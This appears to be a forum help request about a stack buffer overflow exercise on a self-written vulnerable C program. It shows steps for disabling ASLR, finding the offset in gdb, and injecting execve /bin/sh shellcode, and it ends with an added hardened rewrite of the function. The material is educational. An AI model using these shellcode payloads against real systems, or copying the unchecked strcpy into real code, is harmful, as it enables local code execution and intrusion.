I'll tell you the steps I follow so you can help me more easily.
First I disable
Code:
randomize_va_space
Quote:
cat /proc/sys/kernel/randomize_va_space
0
I compile the vulnerable file like this
Quote:
gcc -ggdb --no-stack-protector vuln.c -o vuln
I run gdb and feed in the number of "A"s that are needed
Quote:
$(perl -e 'print "A" x 44 . "B" x 4')
Quote:
(gdb) i r eip ebp
eip 0x42424242 0x42424242
ebp 0x41414141 0x41414141
(gdb)
Which means that if I put in a shell it should come out as... "A" = 44 - 25 = 19
Quote:
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')
Quote:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp
eip 0x42424242 0x42424242
ebp 0x80cd0bb0 0x80cd0bb0
This is where I have to find where RET is; I do it like this
Quote:
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) br overflow
Breakpoint 1 at 0x80483ea: file vuln.c, line 6.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6
6 strcpy(buffer, badbeef);
(gdb) x/x buffer
0xbffff380: 0x00000000
(gdb)
It appears to be
Code:
0xbffff380: 0x00000000
But here comes the problem: if I put that in, no shell shows up. What could be wrong?
Quote:
$(perl -e 'print "\x90" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x80\xf3\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff380 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
I hope you can help me; below I leave the code of the vulnerable file.
Cheers
Code:
#include <stdio.h>
#include <string.h>

void overflow(char *badbeef) {      /* deliberately vulnerable function */
    char buffer[32];                /* 32-byte stack buffer */
    strcpy(buffer, badbeef);        /* unbounded copy of argv[1]; this is vuln.c:6 in the gdb output above */
}

int main(int argc, char *argv[]) {
    overflow(argv[1]);              /* argv[1] is passed without checking argc */
    return 0;
}
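As an added example that is not part of the original post, here is the hardened form of overflow(): instead of strcpy() it measures the argument with strnlen() and refuses anything that would not fit in the 32-byte buffer, so the 44-byte input from the post is rejected rather than overwriting EBP and the return address. The names safe_overflow and BUF_LEN are my own; build it with gcc's default stack protector and leave randomize_va_space at 2 when testing the fix.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 32   /* same buffer size as the original vuln.c */

/* Hardened replacement for overflow(): copy only if the whole string
 * (including its NUL terminator) fits in the buffer, otherwise refuse.
 * Returns 0 on success, -1 if the argument is too long. */
int safe_overflow(const char *badbeef) {
    char buffer[BUF_LEN];
    size_t n = strnlen(badbeef, BUF_LEN);   /* never reads more than BUF_LEN bytes */
    if (n >= BUF_LEN) {
        fprintf(stderr, "argument too long (>= %d bytes), refusing\n", BUF_LEN);
        return -1;                          /* no partial copy, no silent truncation */
    }
    memcpy(buffer, badbeef, n + 1);         /* n < BUF_LEN, so n + 1 bytes fit */
    printf("copied %zu bytes: %s\n", n, buffer);
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {                        /* the original dereferenced argv[1] unconditionally */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    return safe_overflow(argv[1]) == 0 ? 0 : 1;
}
```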